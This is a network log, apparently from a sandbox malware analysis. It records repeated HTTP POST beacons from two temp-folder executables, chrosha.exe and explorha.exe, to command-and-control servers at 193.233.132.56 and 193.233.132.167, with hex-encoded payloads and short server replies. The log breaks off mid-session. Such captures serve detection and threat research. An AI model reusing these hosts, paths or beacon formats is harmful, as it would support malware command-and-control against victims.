Apr 19, 2024 03:31:45.753509045 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:46.006728888 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:45 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
389 | 192.168.2.5 | 50233 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:46.087783098 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:46.334772110 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
390 | 192.168.2.5 | 50234 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:46.365380049 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.610142946 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      391 | 192.168.2.5 | 50235 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.584413052 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.836993933 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      392 | 192.168.2.5 | 50236 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:46.855776072 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.102091074 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:46 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      393 | 192.168.2.5 | 50237 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.202605009 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.454123974 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      394 | 192.168.2.5 | 50238 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.465522051 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.714258909 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      395 | 192.168.2.5 | 50239 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.705157995 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.956870079 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:47 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                                                                                      396 | 192.168.2.5 | 50240 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                                                                                      Apr 19, 2024 03:31:47.970500946 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:48.227771997 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
397 | 192.168.2.5 | 50241 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:48.322894096 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:48.571576118 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
398 | 192.168.2.5 | 50242 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:48.583036900 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:48.826942921 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
399 | 192.168.2.5 | 50243 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:48.825057983 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:49.079473972 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:48 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
400 | 192.168.2.5 | 50244 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:49.074312925 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:31:49.323549032 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
401 | 192.168.2.5 | 50245 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:49.445554972 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:49.689218998 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
402 | 192.168.2.5 | 50246 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:49.684624910 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:31:49.936429024 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:49 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
403 | 192.168.2.5 | 50247 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:49.941083908 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:31:50.193219900 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:31:50 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
404 | 192.168.2.5 | 50248 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:31:50.190536022 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
